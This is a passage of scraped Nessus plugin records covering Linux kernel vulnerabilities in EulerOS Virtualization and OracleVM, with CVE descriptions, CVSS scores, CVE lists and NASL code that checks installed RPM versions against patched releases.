sockfs_setattr.(CVE-2019-8912)A security flaw was found in the Linux kernel that an attempt to move page mapped by AIO ring buffer to the other node triggers NULL pointer dereference at trace_writeback_dirty_page(), because aio_fs_backing_dev_info.dev is 0.(CVE-2016-3070)The NFSv4 implementation in the Linux kernel through 4.11.1 allows local users to cause a denial of service (resource consumption) by leveraging improper channel callback shutdown when unmounting an NFSv4 filesystem, aka a 'module reference and kernel daemon' leak.(CVE-2017-9059)When creating audit records for parameters to executed children processes, an attacker can convince the Linux kernel audit subsystem can create corrupt records which may allow an attacker to misrepresent or evade logging of executing commands.(CVE-2016-6136)A use-after-free vulnerability was found in a network namespaces code affecting the Linux kernel since v4.0-rc1 through v4.15-rc5. The function get_net_ns_by_id() does not check for the net::count value after it has found a peer network in netns_ids idr which could lead to double free and memory corruption. This vulnerability could allow an unprivileged local user to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although it is thought to be unlikely.(CVE-2017-15129)A NULL pointer dereference flaw was found in the rds_ib_laddr_check() function in the Linux kernel's implementation of Reliable Datagram Sockets (RDS). A local, unprivileged user could use this flaw to crash the system.(CVE-2013-7339)A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key.(CVE-2016-8650)The uio_mmap_physical function in drivers/uio/uio.c in the Linux kernel before 3.12 does not validate the size of a memory block, which allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted mmap operations, a different vulnerability than CVE-2013-4511.(CVE-2013-6763)In the Linux kernel before 4.20.5, attackers can trigger a drivers/char/ipmi/ipmi_msghandler.c use-after-free and OOPS by arranging for certain simultaneous execution of the code, as demonstrated by a 'service ipmievd restart' loop.(CVE-2019-9003)An integer overflow flaw was found in the way the Linux kernel randomized the stack for processes on certain 64-bit architecture systems, such as x86-64, causing the stack entropy to be reduced by four.(CVE-2015-1593)The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.(CVE-2014-0038)The kill_something_info function in kernel/signal.c in the Linux kernel before 4.13, when an unspecified architecture and compiler is used, might allow local users to cause a denial of service via an INT_MIN argument.(CVE-2018-10124)arch/s390/kernel/head64.S in the Linux kernel before 3.13.5 on the s390 platform does not properly handle attempted use of the linkage stack, which allows local users to cause a denial of service (system crash) by executing a crafted instruction.(CVE-2014-2039)A flaw was found in the Linux kernel in that the aoedisk_debugfs_show() function in drivers/block/aoe/aoeblk.c allows local users to obtain some kernel address information by reading a debugfs file. This address is not useful to commit a further attack.(CVE-2018-7754)ALSA sequencer core initializes the event pool on demand by invoking snd_seq_pool_init() when the first write happens and the pool is empty. A user can reset the pool size manually via ioctl concurrently, and this may lead to UAF or out-of-bound access.(CVE-2018-7566)In the function wmi_set_ie(), the length validation code does not handle unsigned integer overflow properly. As a result, a large value of the 'ie_len' argument can cause a buffer overflow in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.(CVE-2018-5848)The Linux kernel does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file.(CVE-2018-1118)Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1538)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6763", "CVE-2013-7339", "CVE-2014-0038", "CVE-2014-2039", "CVE-2015-1593", "CVE-2016-3070", "CVE-2016-6136", "CVE-2016-8650", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-18174", "CVE-2017-9059", "CVE-2018-10124", "CVE-2018-1118", "CVE-2018-3639", "CVE-2018-5848", "CVE-2018-7566", "CVE-2018-7754", "CVE-2019-8912", "CVE-2019-9003"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1538.NASL", "href": "https://www.tenable.com/plugins/nessus/124991", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124991);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-6763\",\n \"CVE-2013-7339\",\n \"CVE-2014-0038\",\n \"CVE-2014-2039\",\n \"CVE-2015-1593\",\n \"CVE-2016-3070\",\n \"CVE-2016-6136\",\n \"CVE-2016-8650\",\n \"CVE-2017-15129\",\n \"CVE-2017-16994\",\n \"CVE-2017-18174\",\n \"CVE-2017-9059\",\n \"CVE-2018-10124\",\n \"CVE-2018-1118\",\n \"CVE-2018-3639\",\n \"CVE-2018-5848\",\n \"CVE-2018-7566\",\n \"CVE-2018-7754\",\n \"CVE-2019-8912\",\n \"CVE-2019-9003\"\n );\n script_bugtraq_id(\n 63707,\n 65255,\n 65700,\n 66351,\n 72607\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1538)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):The walk_hugetlb_range()\n function in 'mm/pagewalk.c' file in the Linux kernel\n from v4.0-rc1 through v4.15-rc1 mishandles holes in\n hugetlb ranges. This allows local users to obtain\n sensitive information from uninitialized kernel memory\n via crafted use of the mincore() system\n call.(CVE-2017-16994)In the Linux kernel before 4.7,\n the amd_gpio_remove function in\n drivers/pinctrl/pinctrl-amd.c calls the\n pinctrl_unregister function, leading to a double\n free.(CVE-2017-18174)In the Linux kernel through\n 4.20.11, af_alg_release() in crypto/af_alg.c neglects\n to set a NULL value for a certain structure member,\n which leads to a use-after-free in\n sockfs_setattr.(CVE-2019-8912)A security flaw was found\n in the Linux kernel that an attempt to move page mapped\n by AIO ring buffer to the other node triggers NULL\n pointer dereference at trace_writeback_dirty_page(),\n because aio_fs_backing_dev_info.dev is\n 0.(CVE-2016-3070)The NFSv4 implementation in the Linux\n kernel through 4.11.1 allows local users to cause a\n denial of service (resource consumption) by leveraging\n improper channel callback shutdown when unmounting an\n NFSv4 filesystem, aka a 'module reference and kernel\n daemon' leak.(CVE-2017-9059)When creating audit records\n for parameters to executed children processes, an\n attacker can convince the Linux kernel audit subsystem\n can create corrupt records which may allow an attacker\n to misrepresent or evade logging of executing\n commands.(CVE-2016-6136)A use-after-free vulnerability\n was found in a network namespaces code affecting the\n Linux kernel since v4.0-rc1 through v4.15-rc5. The\n function get_net_ns_by_id() does not check for the\n net::count value after it has found a peer network in\n netns_ids idr which could lead to double free and\n memory corruption. This vulnerability could allow an\n unprivileged local user to induce kernel memory\n corruption on the system, leading to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out, although it is thought to be\n unlikely.(CVE-2017-15129)A NULL pointer dereference\n flaw was found in the rds_ib_laddr_check() function in\n the Linux kernel's implementation of Reliable Datagram\n Sockets (RDS). A local, unprivileged user could use\n this flaw to crash the system.(CVE-2013-7339)A flaw was\n found in the Linux kernel key management subsystem in\n which a local attacker could crash the kernel or\n corrupt the stack and additional memory (denial of\n service) by supplying a specially crafted RSA key. This\n flaw panics the machine during the verification of the\n RSA key.(CVE-2016-8650)The uio_mmap_physical function\n in drivers/uio/uio.c in the Linux kernel before 3.12\n does not validate the size of a memory block, which\n allows local users to cause a denial of service (memory\n corruption) or possibly gain privileges via crafted\n mmap operations, a different vulnerability than\n CVE-2013-4511.(CVE-2013-6763)In the Linux kernel before\n 4.20.5, attackers can trigger a\n drivers/char/ipmi/ipmi_msghandler.c use-after-free and\n OOPS by arranging for certain simultaneous execution of\n the code, as demonstrated by a 'service ipmievd\n restart' loop.(CVE-2019-9003)An integer overflow flaw\n was found in the way the Linux kernel randomized the\n stack for processes on certain 64-bit architecture\n systems, such as x86-64, causing the stack entropy to\n be reduced by four.(CVE-2015-1593)The\n compat_sys_recvmmsg function in net/compat.c in the\n Linux kernel before 3.13.2, when CONFIG_X86_X32 is\n enabled, allows local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer\n parameter.(CVE-2014-0038)The kill_something_info\n function in kernel/signal.c in the Linux kernel before\n 4.13, when an unspecified architecture and compiler is\n used, might allow local users to cause a denial of\n service via an INT_MIN\n argument.(CVE-2018-10124)arch/s390/kernel/head64.S in\n the Linux kernel before 3.13.5 on the s390 platform\n does not properly handle attempted use of the linkage\n stack, which allows local users to cause a denial of\n service (system crash) by executing a crafted\n instruction.(CVE-2014-2039)A flaw was found in the\n Linux kernel in that the aoedisk_debugfs_show()\n function in drivers/block/aoe/aoeblk.c allows local\n users to obtain some kernel address information by\n reading a debugfs file. This address is not useful to\n commit a further attack.(CVE-2018-7754)ALSA sequencer\n core initializes the event pool on demand by invoking\n snd_seq_pool_init() when the first write happens and\n the pool is empty. A user can reset the pool size\n manually via ioctl concurrently, and this may lead to\n UAF or out-of-bound access.(CVE-2018-7566)In the\n function wmi_set_ie(), the length validation code does\n not handle unsigned integer overflow properly. As a\n result, a large value of the 'ie_len' argument can\n cause a buffer overflow in all Android releases from\n CAF (Android for MSM, Firefox OS for MSM, QRD Android)\n using the Linux Kernel.(CVE-2018-5848)The Linux kernel\n does not properly initialize memory in messages passed\n between virtual guests and the host operating system in\n the vhost/vhost.c:vhost_new_msg() function. This can\n allow local privileged users to read some kernel memory\n contents when reading from the /dev/vhost-net device\n file.(CVE-2018-1118)Systems with microprocessors\n utilizing speculative execution and speculative\n execution of memory reads before the addresses of all\n prior memory writes are known may allow unauthorized\n disclosure of information to an attacker with local\n user access via a side-channel analysis, aka\n Speculative Store Bypass (SSB), Variant\n 4.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1538\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb2590a9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-18174\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T15:16:37", "description": "The remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security Advisory OVMSA-2017-0057 for details.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0057) (Dirty COW)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0343", "CVE-2013-1059", "CVE-2013-2140", "CVE-2013-2147", "CVE-2013-2148", "CVE-2013-2164", "CVE-2013-2234", "CVE-2013-2237", "CVE-2013-2850", "CVE-2013-2851", "CVE-2013-2852", "CVE-2013-2888", "CVE-2013-2889", "CVE-2013-2892", "CVE-2013-2893", "CVE-2013-2895", "CVE-2013-2896", "CVE-2013-2897", "CVE-2013-2898", "CVE-2013-2899", "CVE-2013-2929", "CVE-2013-2930", "CVE-2013-4162", "CVE-2013-4163", "CVE-2013-4299", "CVE-2013-4312", "CVE-2013-4345", "CVE-2013-4348", "CVE-2013-4350", "CVE-2013-4470", "CVE-2013-4579", "CVE-2013-4587", "CVE-2013-4592", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2013-6383", "CVE-2013-6885", "CVE-2013-7263", "CVE-2013-7265", "CVE-2013-7266", "CVE-2013-7421", "CVE-2013-7446", "CVE-2014-0038", "CVE-2014-0049", "CVE-2014-0055", "CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0101", "CVE-2014-0181", "CVE-2014-0196", "CVE-2014-1690", "CVE-2014-1737", "CVE-2014-1738", "CVE-2014-1739", "CVE-2014-2309", "CVE-2014-2523", "CVE-2014-2851", "CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153", "CVE-2014-3181", "CVE-2014-3182", "CVE-2014-3184", "CVE-2014-3185", "CVE-2014-3186", "CVE-2014-3215", "CVE-2014-3535", "CVE-2014-3601", "CVE-2014-3610", "CVE-2014-3611", "CVE-2014-3645", "CVE-2014-3646", "CVE-2014-3673", "CVE-2014-3687", "CVE-2014-3688", "CVE-2014-4014", "CVE-2014-4027", "CVE-2014-4171", "CVE-2014-4652", "CVE-2014-4653", "CVE-2014-4654", "CVE-2014-4655", "CVE-2014-4656", "CVE-2014-4667", "CVE-2014-4699", "CVE-2014-4943", "CVE-2014-5471", "CVE-2014-5472", "CVE-2014-6410", "CVE-2014-7822", "CVE-2014-7826", "CVE-2014-7970", "CVE-2014-7975", "CVE-2014-8133", "CVE-2014-8134", "CVE-2014-8159", "CVE-2014-8160", "CVE-2014-8171", "CVE-2014-8173", "CVE-2014-8884", "CVE-2014-8989", "CVE-2014-9090", "CVE-2014-9322", "CVE-2014-9529", "CVE-2014-9585", "CVE-2014-9644", "CVE-2015-0239", "CVE-2015-1333", "CVE-2015-1421", "CVE-2015-1593", "CVE-2015-1805", "CVE-2015-2150", "CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3212", "CVE-2015-3339", "CVE-2015-3636", "CVE-2015-4700", "CVE-2015-5156", "CVE-2015-5157", "CVE-2015-5283", "CVE-2015-5307", "CVE-2015-5364", "CVE-2015-5366", "CVE-2015-5697", "CVE-2015-5707", "CVE-2015-6937", "CVE-2015-7613", "CVE-2015-7872", "CVE-2015-8104", "CVE-2015-8215", "CVE-2015-8374", "CVE-2015-8543", "CVE-2015-8569", "CVE-2015-8767", "CVE-2015-8956", "CVE-2016-0728", "CVE-2016-0758", "CVE-2016-0774", "CVE-2016-10088", "CVE-2016-10142", "CVE-2016-1583", "CVE-2016-2053", "CVE-2016-2117", "CVE-2016-3070", "CVE-2016-3134", "CVE-2016-3140", "CVE-2016-3157", "CVE-2016-3672", "CVE-2016-3699", "CVE-2016-4470", "CVE-2016-4482", "CVE-2016-4485", "CVE-2016-4565", "CVE-2016-4569", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-5195", "CVE-2016-5696", "CVE-2016-5829", "CVE-2016-6136", "CVE-2016-6327", "CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7042", "CVE-2016-7117", "CVE-2016-7425", "CVE-2016-8399", "CVE-2016-8633", "CVE-2016-8645", "CVE-2016-8646", "CVE-2016-8650", "CVE-2016-8655", "CVE-2016-9178", "CVE-2016-9555", "CVE-2016-9588", "CVE-2016-9644", "CVE-2016-9793", "CVE-2016-9794", "CVE-2017-2636", "CVE-2017-5970", "CVE-2017-6074", "CVE-2017-6345", "CVE-2017-7187"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2017-0057.NASL", "href": "https://www.tenable.com/plugins/nessus/99163", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0057.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99163);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2013-0343\",\n \"CVE-2013-1059\",\n \"CVE-2013-2140\",\n \"CVE-2013-2147\",\n \"CVE-2013-2148\",\n \"CVE-2013-2164\",\n \"CVE-2013-2234\",\n \"CVE-2013-2237\",\n \"CVE-2013-2850\",\n \"CVE-2013-2851\",\n \"CVE-2013-2852\",\n \"CVE-2013-2888\",\n \"CVE-2013-2889\",\n \"CVE-2013-2892\",\n \"CVE-2013-2893\",\n \"CVE-2013-2895\",\n \"CVE-2013-2896\",\n \"CVE-2013-2897\",\n \"CVE-2013-2898\",\n \"CVE-2013-2899\",\n \"CVE-2013-2929\",\n \"CVE-2013-2930\",\n \"CVE-2013-4162\",\n \"CVE-2013-4163\",\n \"CVE-2013-4299\",\n \"CVE-2013-4312\",\n \"CVE-2013-4345\",\n \"CVE-2013-4348\",\n \"CVE-2013-4350\",\n \"CVE-2013-4470\",\n \"CVE-2013-4579\",\n \"CVE-2013-4587\",\n \"CVE-2013-4592\",\n \"CVE-2013-6367\",\n \"CVE-2013-6368\",\n \"CVE-2013-6376\",\n \"CVE-2013-6383\",\n \"CVE-2013-6885\",\n \"CVE-2013-7263\",\n \"CVE-2013-7265\",\n \"CVE-2013-7266\",\n \"CVE-2013-7421\",\n \"CVE-2013-7446\",\n \"CVE-2014-0038\",\n \"CVE-2014-0049\",\n \"CVE-2014-0055\",\n \"CVE-2014-0069\",\n \"CVE-2014-0077\",\n \"CVE-2014-0101\",\n \"CVE-2014-0181\",\n \"CVE-2014-0196\",\n \"CVE-2014-1690\",\n \"CVE-2014-1737\",\n \"CVE-2014-1738\",\n \"CVE-2014-1739\",\n \"CVE-2014-2309\",\n \"CVE-2014-2523\",\n \"CVE-2014-2851\",\n \"CVE-2014-3144\",\n \"CVE-2014-3145\",\n \"CVE-2014-3153\",\n \"CVE-2014-3181\",\n \"CVE-2014-3182\",\n \"CVE-2014-3184\",\n \"CVE-2014-3185\",\n \"CVE-2014-3186\",\n \"CVE-2014-3215\",\n \"CVE-2014-3535\",\n \"CVE-2014-3601\",\n \"CVE-2014-3610\",\n \"CVE-2014-3611\",\n \"CVE-2014-3645\",\n \"CVE-2014-3646\",\n \"CVE-2014-3673\",\n \"CVE-2014-3687\",\n \"CVE-2014-3688\",\n \"CVE-2014-4014\",\n \"CVE-2014-4027\",\n \"CVE-2014-4171\",\n \"CVE-2014-4652\",\n \"CVE-2014-4653\",\n \"CVE-2014-4654\",\n \"CVE-2014-4655\",\n \"CVE-2014-4656\",\n \"CVE-2014-4667\",\n \"CVE-2014-4699\",\n \"CVE-2014-4943\",\n \"CVE-2014-5471\",\n \"CVE-2014-5472\",\n \"CVE-2014-6410\",\n \"CVE-2014-7822\",\n \"CVE-2014-7826\",\n \"CVE-2014-7970\",\n \"CVE-2014-7975\",\n \"CVE-2014-8133\",\n \"CVE-2014-8134\",\n \"CVE-2014-8159\",\n \"CVE-2014-8160\",\n \"CVE-2014-8171\",\n \"CVE-2014-8173\",\n \"CVE-2014-8884\",\n \"CVE-2014-8989\",\n \"CVE-2014-9090\",\n \"CVE-2014-9322\",\n \"CVE-2014-9529\",\n \"CVE-2014-9585\",\n \"CVE-2014-9644\",\n \"CVE-2015-0239\",\n \"CVE-2015-1333\",\n \"CVE-2015-1421\",\n \"CVE-2015-1593\",\n \"CVE-2015-1805\",\n \"CVE-2015-2150\",\n \"CVE-2015-2830\",\n \"CVE-2015-2922\",\n \"CVE-2015-3212\",\n \"CVE-2015-3339\",\n \"CVE-2015-3636\",\n \"CVE-2015-4700\",\n \"CVE-2015-5156\",\n \"CVE-2015-5157\",\n \"CVE-2015-5283\",\n \"CVE-2015-5307\",\n \"CVE-2015-5364\",\n \"CVE-2015-5366\",\n \"CVE-2015-5697\",\n \"CVE-2015-5707\",\n \"CVE-2015-6937\",\n \"CVE-2015-7613\",\n \"CVE-2015-7872\",\n \"CVE-2015-8104\",\n \"CVE-2015-8215\",\n \"CVE-2015-8374\",\n \"CVE-2015-8543\",\n \"CVE-2015-8569\",\n \"CVE-2015-8767\",\n \"CVE-2015-8956\",\n \"CVE-2016-0728\",\n \"CVE-2016-0758\",\n \"CVE-2016-0774\",\n \"CVE-2016-10088\",\n \"CVE-2016-10142\",\n \"CVE-2016-1583\",\n \"CVE-2016-2053\",\n \"CVE-2016-2117\",\n \"CVE-2016-3070\",\n \"CVE-2016-3134\",\n \"CVE-2016-3140\",\n \"CVE-2016-3157\",\n \"CVE-2016-3672\",\n \"CVE-2016-3699\",\n \"CVE-2016-4470\",\n \"CVE-2016-4482\",\n \"CVE-2016-4485\",\n \"CVE-2016-4565\",\n \"CVE-2016-4569\",\n \"CVE-2016-4578\",\n \"CVE-2016-4580\",\n \"CVE-2016-4997\",\n \"CVE-2016-4998\",\n \"CVE-2016-5195\",\n \"CVE-2016-5696\",\n \"CVE-2016-5829\",\n \"CVE-2016-6136\",\n \"CVE-2016-6327\",\n \"CVE-2016-6480\",\n \"CVE-2016-6828\",\n \"CVE-2016-7042\",\n \"CVE-2016-7117\",\n \"CVE-2016-7425\",\n \"CVE-2016-8399\",\n \"CVE-2016-8633\",\n \"CVE-2016-8645\",\n \"CVE-2016-8646\",\n \"CVE-2016-8650\",\n \"CVE-2016-8655\",\n \"CVE-2016-9178\",\n \"CVE-2016-9555\",\n \"CVE-2016-9588\",\n \"CVE-2016-9644\",\n \"CVE-2016-9793\",\n \"CVE-2016-9794\",\n \"CVE-2017-2636\",\n \"CVE-2017-5970\",\n \"CVE-2017-6074\",\n \"CVE-2017-6345\",\n \"CVE-2017-7187\"\n );\n script_bugtraq_id(\n 58795,\n 60243,\n 60280,\n 60341,\n 60375,\n 60409,\n 60410,\n 60414,\n 60874,\n 60922,\n 60953,\n 61411,\n 61412,\n 62042,\n 62043,\n 62044,\n 62045,\n 62046,\n 62048,\n 62049,\n 62050,\n 62056,\n 62405,\n 62740,\n 63183,\n 63359,\n 63536,\n 63743,\n 63790,\n 63888,\n 63983,\n 64111,\n 64270,\n 64291,\n 64318,\n 64319,\n 64328,\n 64677,\n 64686,\n 64743,\n 65180,\n 65255,\n 65588,\n 65909,\n 65943,\n 66095,\n 66279,\n 66441,\n 66678,\n 66779,\n 67034,\n 67199,\n 67282,\n 67300,\n 67302,\n 67309,\n 67321,\n 67341,\n 67906,\n 67985,\n 67988,\n 68048,\n 68157,\n 68159,\n 68162,\n 68163,\n 68164,\n 68170,\n 68224,\n 68411,\n 68683,\n 68768,\n 69396,\n 69428,\n 69489,\n 69721,\n 69763,\n 69768,\n 69770,\n 69779,\n 69781,\n 69799,\n 70314,\n 70319,\n 70742,\n 70743,\n 70745,\n 70746,\n 70766,\n 70768,\n 70883,\n 70971,\n 71097,\n 71154,\n 71250,\n 71367,\n 71650,\n 71684,\n 71685,\n 71880,\n 71990,\n 72061,\n 72320,\n 72322,\n 72347,\n 72356,\n 72607,\n 72842,\n 73014,\n 73060,\n 73133,\n 73699,\n 74243,\n 74293,\n 74315,\n 74450,\n 74951,\n 75356,\n 75510,\n 76005\n );\n script_xref(name:\"IAVA\", value:\"2016-A-0306-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0057) (Dirty COW)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2017-0057 for details.\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000675.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc2355e2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel-uek / kernel-uek-firmware packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 